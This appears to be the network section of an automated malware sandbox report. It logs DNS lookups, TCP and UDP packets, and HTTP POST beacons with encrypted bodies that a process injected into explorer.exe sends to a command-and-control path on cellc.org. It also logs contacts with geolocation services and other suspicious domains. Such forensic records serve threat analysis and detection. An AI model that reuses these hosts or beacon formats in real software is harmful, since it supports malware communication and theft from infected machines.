                                                                                                                                                                                                                                May 8, 2024 16:41:18.872653961 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932898998 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932940960 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932956934 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:18.932964087 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:19.199697971 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549418926 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549504042 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549710035 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549734116 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:19.901177883 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:20.656434059 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:20.666542053 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:20.666939020 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:20.666991949 CEST4974480192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:20.671140909 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.017755032 CEST8049744179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026542902 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026655912 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026859999 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026881933 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:21.386492014 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.106245995 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.115447998 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.115533113 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.115602970 CEST4974580192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.118336916 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.468358994 CEST8049745179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.470484972 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:22.470638037 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.482662916 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.482688904 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:22.828958988 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.576873064 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.577550888 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.577620983 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.577882051 CEST4974780192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.590972900 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.932233095 CEST8049747179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944197893 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944437027 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944554090 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944581985 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:24.296936989 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.047538042 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.052736998 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.052798033 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.052947998 CEST4974880192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.060220003 CEST4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.401262999 CEST8049748179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.413958073 CEST8049749179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:25.414033890 CEST4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.414324999 CEST4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.414350986 CEST4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:25.778088093 CEST8049749179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:26.490622044 CEST8049749179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:26.503127098 CEST8049749179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:26.503185987 CEST4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:26.503226995 CEST4974980192.168.2.4179.159.229.64
                                                                                                                                                                                                                                May 8, 2024 16:41:26.869178057 CEST8049749179.159.229.64192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:33.597908020 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:33.811403990 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:33.812333107 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:33.817997932 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:34.042567968 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:34.281038046 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:34.496082067 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:34.501632929 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:34.764916897 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:34.764972925 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:35.030664921 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:35.103990078 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:35.115662098 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:35.329086065 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:35.468539953 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:35.687021017 CEST4975280192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:35.689140081 CEST4975380192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:35.988605976 CEST8049752178.237.33.50192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:35.988729000 CEST4975280192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:35.990170002 CEST8049753178.237.33.50192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:35.990236044 CEST4975380192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:36.030019999 CEST4975280192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:36.341526985 CEST8049752178.237.33.50192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:36.341727018 CEST4975280192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:36.387072086 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:41:36.655478954 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:37.008173943 CEST4975480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                May 8, 2024 16:41:37.173222065 CEST8049754208.95.112.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:37.173310041 CEST4975480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                May 8, 2024 16:41:37.173465967 CEST4975480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                May 8, 2024 16:41:37.336184025 CEST8049754208.95.112.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:37.336844921 CEST4975480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                May 8, 2024 16:41:37.342603922 CEST8049752178.237.33.50192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:37.342936039 CEST4975280192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:41:37.503549099 CEST8049754208.95.112.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:37.503638029 CEST4975480192.168.2.4208.95.112.1
                                                                                                                                                                                                                                May 8, 2024 16:41:41.289315939 CEST8049753178.237.33.50192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:41.289340019 CEST8049753178.237.33.50192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:41.289397955 CEST4975380192.168.2.4178.237.33.50
                                                                                                                                                                                                                                May 8, 2024 16:42:04.506674051 CEST240449751193.149.176.178192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:42:04.510014057 CEST497512404192.168.2.4193.149.176.178
                                                                                                                                                                                                                                May 8, 2024 16:42:04.767342091 CEST240449751193.149.176.178192.168.2.4

                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                May 8, 2024 16:40:10.240375996 CEST5307753192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:40:10.410495043 CEST53530771.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:11.853027105 CEST5002853192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:40:12.023823977 CEST53500281.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:40:58.639718056 CEST5279353192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:40:59.624875069 CEST5279353192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:00.640481949 CEST5279353192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:02.640734911 CEST5279353192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST53527931.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST53527931.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST53527931.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST53527931.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:09.422688007 CEST5762453192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:10.421741962 CEST5762453192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:10.449239016 CEST53576241.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:10.584939957 CEST53576241.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:29.259946108 CEST5162153192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:29.428303003 CEST53516211.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:35.507747889 CEST6092153192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:35.676626921 CEST53609211.1.1.1192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:36.828860998 CEST5332353192.168.2.41.1.1.1
                                                                                                                                                                                                                                May 8, 2024 16:41:36.992717028 CEST53533231.1.1.1192.168.2.4

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                May 8, 2024 16:40:10.240375996 CEST192.168.2.41.1.1.10xad3Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:11.853027105 CEST192.168.2.41.1.1.10x6365Standard query (0)uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENVA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:58.639718056 CEST192.168.2.41.1.1.10x8009Standard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:59.624875069 CEST192.168.2.41.1.1.10x8009Standard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:00.640481949 CEST192.168.2.41.1.1.10x8009Standard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:02.640734911 CEST192.168.2.41.1.1.10x8009Standard query (0)cellc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:09.422688007 CEST192.168.2.41.1.1.10x8926Standard query (0)makemoneyminds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:10.421741962 CEST192.168.2.41.1.1.10x8926Standard query (0)makemoneyminds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:29.259946108 CEST192.168.2.41.1.1.10x8807Standard query (0)blank-dvgxd.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:35.507747889 CEST192.168.2.41.1.1.10x3dcaStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:36.828860998 CEST192.168.2.41.1.1.10xafc4Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                May 8, 2024 16:40:10.410495043 CEST1.1.1.1192.168.2.40xad3No error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:10.410495043 CEST1.1.1.1192.168.2.40xad3No error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:12.023823977 CEST1.1.1.1192.168.2.40x6365Name error (3)uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENVnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:24.692898989 CEST1.1.1.1192.168.2.40xf6d4No error (0)au.c-0005.c-msedge.netc-0005.c-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:40:24.692898989 CEST1.1.1.1192.168.2.40xf6d4No error (0)c-0005.c-dc-msedge.net13.107.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org179.159.229.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org189.189.229.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.28.110.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org201.233.78.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561168909 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org179.159.229.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org189.189.229.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.28.110.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org201.233.78.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561192036 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org179.159.229.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org189.189.229.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.28.110.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org201.233.78.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561422110 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org179.159.229.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org189.189.229.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org190.28.110.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org201.233.78.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:03.561502934 CEST1.1.1.1192.168.2.40x8009No error (0)cellc.org95.86.30.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:10.449239016 CEST1.1.1.1192.168.2.40x8926No error (0)makemoneyminds.com65.108.69.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:10.584939957 CEST1.1.1.1192.168.2.40x8926No error (0)makemoneyminds.com65.108.69.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:29.428303003 CEST1.1.1.1192.168.2.40x8807Name error (3)blank-dvgxd.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:35.676626921 CEST1.1.1.1192.168.2.40x3dcaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                May 8, 2024 16:41:36.992717028 CEST1.1.1.1192.168.2.40xafc4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • 2no.co
                                                                                                                                                                                                                                • makemoneyminds.com
                                                                                                                                                                                                                                • ywleoxljcxyhv.net
                                                                                                                                                                                                                                  • cellc.org
                                                                                                                                                                                                                                • slmlafyecvd.com
                                                                                                                                                                                                                                • qiehbuqbrmnvwc.com
                                                                                                                                                                                                                                • orvskgrekvfetnl.net
                                                                                                                                                                                                                                • ayiplbxojpvv.org
                                                                                                                                                                                                                                • cqileharharpgfrs.com
                                                                                                                                                                                                                                • uyobkmevwtj.org
                                                                                                                                                                                                                                • cnojjwiexgft.net
                                                                                                                                                                                                                                • niqqkedjvbevod.org
                                                                                                                                                                                                                                • geoplugin.net
                                                                                                                                                                                                                                • ip-api.com

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.449739179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:03.912734985 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://ywleoxljcxyhv.net/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 244
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:03.912771940 CEST244OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 48 c7 93
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA .[k,vu8H__UQis44=`g0zBdx7'!.SLoh8b1_%G}q$--4mjl3M_zsS*
                                                                                                                                                                                                                                May 8, 2024 16:41:04.977279902 CEST177INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:04 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 03 00 00 00 72 e8 83
                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.449740179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:05.348623991 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://slmlafyecvd.com/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:05.348661900 CEST347OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5b 08 d8 e6
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vu[bOtXZF5sXE<g?35nHP2_F6Z/J3gI5~b2/31lNs>'0L]aT ,
                                                                                                                                                                                                                                May 8, 2024 16:41:06.447591066 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:06 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
